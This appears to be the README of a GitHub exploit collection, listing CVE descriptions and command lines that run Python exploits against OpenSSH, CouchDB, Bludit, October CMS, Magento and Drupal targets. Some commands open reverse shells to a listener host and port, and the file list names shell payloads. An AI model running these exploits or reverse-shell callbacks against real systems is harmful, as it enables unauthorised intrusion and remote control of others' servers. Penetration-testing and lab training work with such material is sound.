vulnexipy

Vulnerabilities exploitation examples

Examples

clone the repository

git clone https://github.com/cocomelonc/vulnexipy

go to the dir:

cd vulnexipy

run python exploit, for example:

python3 cve_2009_3548.py -u http://172.16.64.101:8080/ -U tomcat -P s3cret -i 172.16.64.10 -p 4444

CVE-2016-6210 - sshd in OpenSSH before 7.3, when SHA256 or SHA512 are used for user password hashing, uses BLOWFISH hashing on a static password when the username does not exist, which allows remote attackers to enumerate users by leveraging the timing difference between responses when a large password is provided.

python cve_2016_6210.py --target 10.10.6.17 --usernames users.txt

CVE-2016-6515 - The auth_password function in auth-passwd.c in sshd in OpenSSH before 7.3 does not limit password lengths for password authentication, which allows remote attackers to cause a denial of service (crypt CPU consumption) via a long string.

python cve_2016_6515.py --target 10.10.6.13 --username root

CVE-2017-12635 - Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit '_users' documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users.

python cve_2017_12635 --target 10.10.6.14 -u couchdb -p mysuperpswd

CVE-2019-16113 - Bludit 3.9.2 allows remote code execution via bl-kernel/ajax/upload-images.php because PHP code can be entered with a .jpg file name, and then this PHP code can write other PHP code to a ../ pathname.

python cve_2019_16113.py --url 10.10.6.15 --username admin --password admin --cmd whoami

CVE-2017-1000119 - October CMS build 412 is vulnerable to PHP code execution in the file upload functionality resulting in site compromise and possibly other applications on the server.

python cve_2017_1000119.py --url http://10.10.6.16 -user admin -pswd admin -lhost 10.10.14.16 -lport 4444

Magento Community Edition < 1.9.0.1 - Authenticated Remote Code Execution

python magento_auth_rce.py --url http://10.10.10.112 --user admin --pswd admin

CVE-2018-7600 - Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.

python cve_2018_7600.py --url http://10.10.10.151 --cmd whoami

This tool is a Proof of Concept and is for Educational Purposes Only!!! Author takes no responsibility of any damage you cause

Name		Name	Last commit message	Last commit date
Latest commit History 99 Commits
.gitignore		.gitignore
README.md		README.md
blue.exe		blue.exe
cat.gif		cat.gif
cats.php		cats.php
cve_2004_2687.py		cve_2004_2687.py
cve_2007_2447.py		cve_2007_2447.py
cve_2009_2265.py		cve_2009_2265.py
cve_2009_3548.py		cve_2009_3548.py
cve_2010_2075.py		cve_2010_2075.py
cve_2010_2861.py		cve_2010_2861.py
cve_2012_4869.py		cve_2012_4869.py
cve_2012_6081.py		cve_2012_6081.py
cve_2014_4511.py		cve_2014_4511.py
cve_2014_4688.py		cve_2014_4688.py
cve_2014_6271.py		cve_2014_6271.py
cve_2014_6287.py		cve_2014_6287.py
cve_2014_6287_2.py		cve_2014_6287_2.py
cve_2015_1397.py		cve_2015_1397.py
cve_2015_1830.py		cve_2015_1830.py
cve_2015_3306.py		cve_2015_3306.py
cve_2015_4870.py		cve_2015_4870.py
cve_2015_6967.py		cve_2015_6967.py
cve_2016_10033.py		cve_2016_10033.py
cve_2016_2098.py		cve_2016_2098.py
cve_2016_6210.py		cve_2016_6210.py
cve_2016_6515.py		cve_2016_6515.py
cve_2017_1000119.py		cve_2017_1000119.py
cve_2017_12635.py		cve_2017_12635.py
cve_2017_12636.py		cve_2017_12636.py
cve_2017_5638.py		cve_2017_5638.py
cve_2017_5941.py		cve_2017_5941.py
cve_2017_7269.py		cve_2017_7269.py
cve_2018_1133.py		cve_2018_1133.py
cve_2018_11776.py		cve_2018_11776.py
cve_2018_1306.py		cve_2018_1306.py
cve_2018_15473.py		cve_2018_15473.py
cve_2018_19585_gitlab_rce.py		cve_2018_19585_gitlab_rce.py
cve_2018_6389.py		cve_2018_6389.py
cve_2018_7600.py		cve_2018_7600.py
cve_2018_9276.py		cve_2018_9276.py
cve_2019_1068.py		cve_2019_1068.py
cve_2019_11447.py		cve_2019_11447.py
cve_2019_11581.py		cve_2019_11581.py
cve_2019_12840.py		cve_2019_12840.py
cve_2019_13024.py		cve_2019_13024.py
cve_2019_15107.py		cve_2019_15107.py
cve_2019_16113.py		cve_2019_16113.py
cve_2019_16278.py		cve_2019_16278.py
cve_2019_16701.py		cve_2019_16701.py
cve_2019_16759.py		cve_2019_16759.py
cve_2019_17240.py		cve_2019_17240.py
cve_2019_20085.py		cve_2019_20085.py
cve_2019_5418.py		cve_2019_5418.py
cve_2019_5420.py		cve_2019_5420.py
cve_2019_6340.py		cve_2019_6340.py
cve_2019_7609.py		cve_2019_7609.py
cve_2019_9053.py		cve_2019_9053.py
cve_2019_9978.py		cve_2019_9978.py
cve_2020_10977.py		cve_2020_10977.py
cve_2020_10977_rce.py		cve_2020_10977_rce.py
cve_2020_12720.py		cve_2020_12720.py
cve_2020_14882.py		cve_2020_14882.py
cve_2020_14947.py		cve_2020_14947.py
cve_2020_5902.py		cve_2020_5902.py
cve_2020_7384.py		cve_2020_7384.py
cve_2020_8163.py		cve_2020_8163.py
cve_2020_8813.py		cve_2020_8813.py
cve_2020_9484.py		cve_2020_9484.py
cve_2021_3164.py		cve_2021_3164.py
elastix_graph_lfi.py		elastix_graph_lfi.py
freeftpd_remote_buffow.py		freeftpd_remote_buffow.py
gym_ms_rce.py		gym_ms_rce.py
hack.gif		hack.gif
helpdeskz_unauth_shell.py		helpdeskz_unauth_shell.py
joomla388_rce.py		joomla388_rce.py
litecart_cms_afu.py		litecart_cms_afu.py
log_colors.py		log_colors.py
magento_auth_rce.py		magento_auth_rce.py
openemr_auth_rce.py		openemr_auth_rce.py
openemr_auth_shell.py		openemr_auth_shell.py
opennet_admin_rce.py		opennet_admin_rce.py
oscommerce_rce.py		oscommerce_rce.py
passwords.txt		passwords.txt
requirements.txt		requirements.txt
rev_shell.py		rev_shell.py
rev_shell_payload.py		rev_shell_payload.py
revpld.py		revpld.py
shell.php		shell.php
shell.war		shell.war
test.xml		test.xml
umbraco_cms_rce.py		umbraco_cms_rce.py
users.txt		users.txt
vbulletin_rce_2020.py		vbulletin_rce_2020.py
werkzeug_revsh.py		werkzeug_revsh.py
wordpress_xmlrpc.py		wordpress_xmlrpc.py
ysoserial.jar		ysoserial.jar

cocomelonc/vulnexipy

Folders and files

Latest commit

History